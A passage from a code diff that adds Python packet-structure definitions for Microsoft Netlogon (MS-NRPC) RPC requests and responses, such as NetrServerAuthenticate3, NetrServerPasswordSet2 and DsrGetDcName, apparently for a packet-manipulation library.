(lambda pkt: getattr(pkt, "QueryLevel", None) == 3), + (lambda _, val: val.tag == 3), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_4(), PNETLOGON_INFO_4) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 4), + (lambda _, val: val.tag == 4), + ), + ), + ], + StrFixedLenField("Buffer", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + NDRIntField("status", 0), + ] + + +class NetrGetAnyDCName_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + ] + + +class NetrGetAnyDCName_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("Buffer", "")), + NDRIntField("status", 0), + ] + + +class NetrLogonControl2_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRIntField("FunctionCode", 0), + NDRIntField("QueryLevel", 0), + NDRUnionField( + [ + ( + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("Data", "")), + ( + ( + lambda pkt: getattr(pkt, "FunctionCode", None) + in [5, 6, 9, 10] + ), + (lambda _, val: val.tag in [5, 6, 9, 10]), + ), + ), + ( + NDRIntField("Data", 0), + ( + (lambda pkt: getattr(pkt, "FunctionCode", None) == 65534), + (lambda _, val: val.tag == 65534), + ), + ), + ( + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("Data", "")), + ( + (lambda pkt: getattr(pkt, "FunctionCode", None) == 8), + (lambda _, val: val.tag == 8), + ), + ), + ], + StrFixedLenField("Data", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + ] + + +class NetrLogonControl2_Response(NDRPacket): + fields_desc = [ + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_1(), PNETLOGON_INFO_1) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_2(), PNETLOGON_INFO_2) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_3(), PNETLOGON_INFO_3) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 3), + (lambda _, val: val.tag == 3), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_4(), PNETLOGON_INFO_4) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 4), + (lambda _, val: val.tag == 4), + ), + ), + ], + StrFixedLenField("Buffer", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + NDRIntField("status", 0), + ] + + +class NetrServerAuthenticate2_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("SecureChannelType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "ClientCredential", PNETLOGON_CREDENTIAL(), PNETLOGON_CREDENTIAL + ), + NDRIntField("NegotiateFlags", 0), + ] + + +class NetrServerAuthenticate2_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ServerCredential", PNETLOGON_CREDENTIAL(), PNETLOGON_CREDENTIAL + ), + NDRIntField("NegotiateFlags", 0), + NDRIntField("status", 0), + ] + + +class SYNC_STATE(IntEnum): + NormalState = 0 + DomainState = 1 + GroupState = 2 + UasBuiltInGroupState = 3 + UserState = 4 + GroupMemberState = 5 + AliasState = 6 + AliasMemberState = 7 + SamDoneState = 8 + + +class NetrDatabaseSync2_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("PrimaryName", ""), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("DatabaseID", 0), + NDRInt3264EnumField("RestartState", 0, SYNC_STATE), + NDRIntField("SyncContext", 0), + NDRIntField("PreferredMaximumLength", 0), + ] + + +class NetrDatabaseSync2_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("SyncContext", 0), + NDRFullPointerField( + NDRPacketField( + "DeltaArray", PNETLOGON_DELTA_ENUM_ARRAY(), PNETLOGON_DELTA_ENUM_ARRAY + ) + ), + NDRIntField("status", 0), + ] + + +class NetrDatabaseRedo_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("PrimaryName", ""), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRConfStrLenField( + "ChangeLogEntry", "", size_is=lambda pkt: pkt.ChangeLogEntrySize + ), + NDRIntField("ChangeLogEntrySize", None, size_of="ChangeLogEntry"), + ] + + +class NetrDatabaseRedo_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRFullPointerField( + NDRPacketField( + "DeltaArray", PNETLOGON_DELTA_ENUM_ARRAY(), PNETLOGON_DELTA_ENUM_ARRAY + ) + ), + NDRIntField("status", 0), + ] + + +class NetrLogonControl2Ex_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRIntField("FunctionCode", 0), + NDRIntField("QueryLevel", 0), + NDRUnionField( + [ + ( + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("Data", "")), + ( + ( + lambda pkt: getattr(pkt, "FunctionCode", None) + in [5, 6, 9, 10] + ), + (lambda _, val: val.tag in [5, 6, 9, 10]), + ), + ), + ( + NDRIntField("Data", 0), + ( + (lambda pkt: getattr(pkt, "FunctionCode", None) == 65534), + (lambda _, val: val.tag == 65534), + ), + ), + ( + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("Data", "")), + ( + (lambda pkt: getattr(pkt, "FunctionCode", None) == 8), + (lambda _, val: val.tag == 8), + ), + ), + ], + StrFixedLenField("Data", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + ] + + +class NetrLogonControl2Ex_Response(NDRPacket): + fields_desc = [ + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_1(), PNETLOGON_INFO_1) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_2(), PNETLOGON_INFO_2) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_3(), PNETLOGON_INFO_3) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 3), + (lambda _, val: val.tag == 3), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_4(), PNETLOGON_INFO_4) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 4), + (lambda _, val: val.tag == 4), + ), + ), + ], + StrFixedLenField("Buffer", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + NDRIntField("status", 0), + ] + + +class PDOMAIN_NAME_BUFFER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("DomainNameByteCount", None, size_of="DomainNames"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "DomainNames", "", size_is=lambda pkt: pkt.DomainNameByteCount + ) + ), + ] + + +class NetrEnumerateTrustedDomains_Request(NDRPacket): + fields_desc = [NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", ""))] + + +class NetrEnumerateTrustedDomains_Response(NDRPacket): + fields_desc = [ + NDRPacketField("DomainNameBuffer", PDOMAIN_NAME_BUFFER(), PDOMAIN_NAME_BUFFER), + NDRIntField("status", 0), + ] + + +class GUID(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRIntField("Data1", 0), + NDRShortField("Data2", 0), + NDRShortField("Data3", 0), + StrFixedLenField("Data4", "", length=8), + ] + + +class PDOMAIN_CONTROLLER_INFOW(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DomainControllerName", "")), + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("DomainControllerAddress", "") + ), + NDRIntField("DomainControllerAddressType", 0), + NDRPacketField("DomainGuid", GUID(), GUID), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DnsForestName", "")), + NDRIntField("Flags", 0), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DcSiteName", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("ClientSiteName", "")), + ] + + +class DsrGetDcName_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + NDRFullPointerField(NDRPacketField("DomainGuid", GUID(), GUID)), + NDRFullPointerField(NDRPacketField("SiteGuid", GUID(), GUID)), + NDRIntField("Flags", 0), + ] + + +class DsrGetDcName_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "DomainControllerInfo", + PDOMAIN_CONTROLLER_INFOW(), + PDOMAIN_CONTROLLER_INFOW, + ) + ), + NDRIntField("status", 0), + ] + + +class NetrLogonGetCapabilities_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("ServerName", ""), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("QueryLevel", 0), + ] + + +class NetrLogonGetCapabilities_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRUnionField( + [ + ( + NDRIntField("Capabilities", 0), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRIntField("Capabilities", 0), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ], + StrFixedLenField("Capabilities", "", length=0), + align=(4, 4), + switch_fmt=("L", "L"), + ), + NDRIntField("status", 0), + ] + + +class NetrLogonSetServiceBits_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRIntField("ServiceBitsOfInterest", 0), + NDRIntField("ServiceBits", 0), + ] + + +class NetrLogonSetServiceBits_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class NetrLogonGetTrustRid_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + ] + + +class NetrLogonGetTrustRid_Response(NDRPacket): + fields_desc = [NDRIntField("Rid", 0), NDRIntField("status", 0)] + + +class NetrLogonComputeServerDigest_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRIntField("Rid", 0), + NDRConfStrLenField("Message", "", size_is=lambda pkt: pkt.MessageSize), + NDRIntField("MessageSize", None, size_of="Message"), + ] + + +class NetrLogonComputeServerDigest_Response(NDRPacket): + fields_desc = [ + StrFixedLenField("NewMessageDigest", "", length=16), + StrFixedLenField("OldMessageDigest", "", length=16), + NDRIntField("status", 0), + ] + + +class NetrLogonComputeClientDigest_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + NDRConfStrLenField("Message", "", size_is=lambda pkt: pkt.MessageSize), + NDRIntField("MessageSize", None, size_of="Message"), + ] + + +class NetrLogonComputeClientDigest_Response(NDRPacket): + fields_desc = [ + StrFixedLenField("NewMessageDigest", "", length=16), + StrFixedLenField("OldMessageDigest", "", length=16), + NDRIntField("status", 0), + ] + + +class NetrServerAuthenticate3_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("SecureChannelType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "ClientCredential", PNETLOGON_CREDENTIAL(), PNETLOGON_CREDENTIAL + ), + NDRIntField("NegotiateFlags", 0), + ] + + +class NetrServerAuthenticate3_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ServerCredential", PNETLOGON_CREDENTIAL(), PNETLOGON_CREDENTIAL + ), + NDRIntField("NegotiateFlags", 0), + NDRIntField("AccountRid", 0), + NDRIntField("status", 0), + ] + + +class DsrGetDcNameEx_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + NDRFullPointerField(NDRPacketField("DomainGuid", GUID(), GUID)), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("SiteName", "")), + NDRIntField("Flags", 0), + ] + + +class DsrGetDcNameEx_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "DomainControllerInfo", + PDOMAIN_CONTROLLER_INFOW(), + PDOMAIN_CONTROLLER_INFOW, + ) + ), + NDRIntField("status", 0), + ] + + +class DsrGetSiteName_Request(NDRPacket): + fields_desc = [NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", ""))] + + +class DsrGetSiteName_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("SiteName", "")), + NDRIntField("status", 0), + ] + + +class NETLOGON_LSA_POLICY_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("LsaPolicySize", None, size_of="LsaPolicy"), + NDRFullEmbPointerField( + NDRConfStrLenField("LsaPolicy", "", size_is=lambda pkt: pkt.LsaPolicySize) + ), + ] + + +class PNETLOGON_WORKSTATION_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField( + "LsaPolicy", NETLOGON_LSA_POLICY_INFO(), NETLOGON_LSA_POLICY_INFO + ), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DnsHostName", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("SiteName", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("Dummy1", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("Dummy2", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("Dummy3", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("Dummy4", "")), + NDRPacketField("OsVersion", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("OsName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("WorkstationFlags", 0), + NDRIntField("KerberosSupportedEncryptionTypes", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class NETLOGON_ONE_DOMAIN_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("DomainName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DnsDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DnsForestName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DomainGuid", GUID(), GUID), + NDRFullEmbPointerField(NDRPacketField("DomainSid", PRPC_SID(), PRPC_SID)), + NDRPacketField("TrustExtension", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_ONE_DOMAIN_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("DomainName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DnsDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DnsForestName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DomainGuid", GUID(), GUID), + NDRFullEmbPointerField(NDRPacketField("DomainSid", PRPC_SID(), PRPC_SID)), + NDRPacketField("TrustExtension", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DOMAIN_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField( + "PrimaryDomain", NETLOGON_ONE_DOMAIN_INFO(), NETLOGON_ONE_DOMAIN_INFO + ), + NDRIntField("TrustedDomainCount", None, size_of="TrustedDomains"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "TrustedDomains", + [], + PNETLOGON_ONE_DOMAIN_INFO, + size_is=lambda pkt: pkt.TrustedDomainCount, + ) + ), + NDRPacketField( + "LsaPolicy", NETLOGON_LSA_POLICY_INFO(), NETLOGON_LSA_POLICY_INFO + ), + NDRPacketField("DnsHostNameInDs", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("WorkstationFlags", 0), + NDRIntField("SupportedEncTypes", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_LSA_POLICY_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("LsaPolicySize", None, size_of="LsaPolicy"), + NDRFullEmbPointerField( + NDRConfStrLenField("LsaPolicy", "", size_is=lambda pkt: pkt.LsaPolicySize) + ), + ] + + +class NetrLogonGetDomainInfo_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("ServerName", ""), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("Level", 0), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "WkstaBuffer", + PNETLOGON_WORKSTATION_INFO(), + PNETLOGON_WORKSTATION_INFO, + ) + ), + ( + (lambda pkt: getattr(pkt, "Level", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "WkstaBuffer", + PNETLOGON_WORKSTATION_INFO(), + PNETLOGON_WORKSTATION_INFO, + ) + ), + ( + (lambda pkt: getattr(pkt, "Level", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ], + StrFixedLenField("WkstaBuffer", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + ] + + +class NetrLogonGetDomainInfo_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "DomBuffer", PNETLOGON_DOMAIN_INFO(), PNETLOGON_DOMAIN_INFO + ) + ), + ( + (lambda pkt: getattr(pkt, "Level", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "DomBuffer", + PNETLOGON_LSA_POLICY_INFO(), + PNETLOGON_LSA_POLICY_INFO, + ) + ), + ( + (lambda pkt: getattr(pkt, "Level", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ], + StrFixedLenField("DomBuffer", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + NDRIntField("status", 0), + ] + + +class PNL_TRUST_PASSWORD(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + StrFixedLenFieldUtf16("Buffer", "", length=256 * 2), + NDRIntField("Length", 0), + ] + + +class NetrServerPasswordSet2_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("SecureChannelType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField("ClearNewPassword", PNL_TRUST_PASSWORD(), PNL_TRUST_PASSWORD), + ] + + +class NetrServerPasswordSet2_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("status", 0), + ] + + +class NetrServerPasswordGet_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("AccountType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + ] + + +class NetrServerPasswordGet_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "EncryptedNtOwfPassword", + PENCRYPTED_NT_OWF_PASSWORD(), + PENCRYPTED_NT_OWF_PASSWORD, + ), + NDRIntField("status", 0), + ] + + +class NetrLogonSendToSam_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRConfStrLenField( + "OpaqueBuffer", "", size_is=lambda pkt: pkt.OpaqueBufferSize + ), + NDRIntField("OpaqueBufferSize", None, size_of="OpaqueBuffer"), + ] + + +class NetrLogonSendToSam_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("status", 0), + ] + + +class PNL_SOCKET_ADDRESS(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField( + NDRConfStrLenField( + "lpSockaddr", "", size_is=lambda pkt: pkt.iSockaddrLength + ) + ), + NDRIntField("iSockaddrLength", None, size_of="lpSockaddr"), + ] + + +class PNL_SITE_NAME_ARRAY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("EntryCount", None, size_of="SiteNames"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "SiteNames", [], PUNICODE_STRING, size_is=lambda pkt: pkt.EntryCount + ) + ), + ] + + +class DsrAddressToSiteNamesW_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRIntField("EntryCount", None, size_of="SocketAddresses"), + NDRConfPacketListField( + "SocketAddresses", + [], + PNL_SOCKET_ADDRESS, + size_is=lambda pkt: pkt.EntryCount, + ), + ] + + +class DsrAddressToSiteNamesW_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField("SiteNames", PNL_SITE_NAME_ARRAY(), PNL_SITE_NAME_ARRAY) + ), + NDRIntField("status", 0), + ] + + +class DsrGetDcNameEx2_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("AccountName", "")), + NDRIntField("AllowableAccountControlBits", 0), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + NDRFullPointerField(NDRPacketField("DomainGuid", GUID(), GUID)), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("SiteName", "")), + NDRIntField("Flags", 0), + ] + + +class DsrGetDcNameEx2_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "DomainControllerInfo", + PDOMAIN_CONTROLLER_INFOW(), + PDOMAIN_CONTROLLER_INFOW, + ) + ), + NDRIntField("status", 0), + ] + + +class NetrLogonGetTimeServiceParentDomain_Request(NDRPacket): + fields_desc = [NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", ""))] + + +class NetrLogonGetTimeServiceParentDomain_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + NDRSignedIntField("PdcSameSite", 0), + NDRIntField("status", 0), + ] + + +class PDS_DOMAIN_TRUSTSW(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("NetbiosDomainName", "")), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DnsDomainName", "")), + NDRIntField("Flags", 0), + NDRIntField("ParentIndex", 0), + NDRIntField("TrustType", 0), + NDRIntField("TrustAttributes", 0), + NDRFullEmbPointerField(NDRPacketField("DomainSid", PRPC_SID(), PRPC_SID)), + NDRPacketField("DomainGuid", GUID(), GUID), + ] + + +class PNETLOGON_TRUSTED_DOMAIN_ARRAY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("DomainCount", None, size_of="Domains"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "Domains", [], PDS_DOMAIN_TRUSTSW, size_is=lambda pkt: pkt.DomainCount + ) + ), + ] + + +class NetrEnumerateTrustedDomainsEx_Request(NDRPacket): + fields_desc = [NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", ""))] + + +class NetrEnumerateTrustedDomainsEx_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "Domains", PNETLOGON_TRUSTED_DOMAIN_ARRAY(), PNETLOGON_TRUSTED_DOMAIN_ARRAY + ), + NDRIntField("status", 0), + ] + + +class PNL_SITE_NAME_EX_ARRAY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("EntryCount", None, size_of="SubnetNames"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "SiteNames", [], PUNICODE_STRING, size_is=lambda pkt: pkt.EntryCount + ) + ), + NDRFullEmbPointerField( + NDRConfPacketListField( + "SubnetNames", [], PUNICODE_STRING, size_is=lambda pkt: pkt.EntryCount + ) + ), + ] + + +class DsrAddressToSiteNamesExW_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRIntField("EntryCount", None, size_of="SocketAddresses"), + NDRConfPacketListField( + "SocketAddresses", + [], + PNL_SOCKET_ADDRESS, + size_is=lambda pkt: pkt.EntryCount, + ), + ] + + +class DsrAddressToSiteNamesExW_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "SiteNames", PNL_SITE_NAME_EX_ARRAY(), PNL_SITE_NAME_EX_ARRAY + ) + ), + NDRIntField("status", 0), + ] + + +class DsrGetDcSiteCoverageW_Request(NDRPacket): + fields_desc = [NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", ""))] + + +class DsrGetDcSiteCoverageW_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField("SiteNames", PNL_SITE_NAME_ARRAY(), PNL_SITE_NAME_ARRAY) + ), + NDRIntField("status", 0), + ] + + +class NetrLogonSamLogonEx_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("LogonServer", "")), + 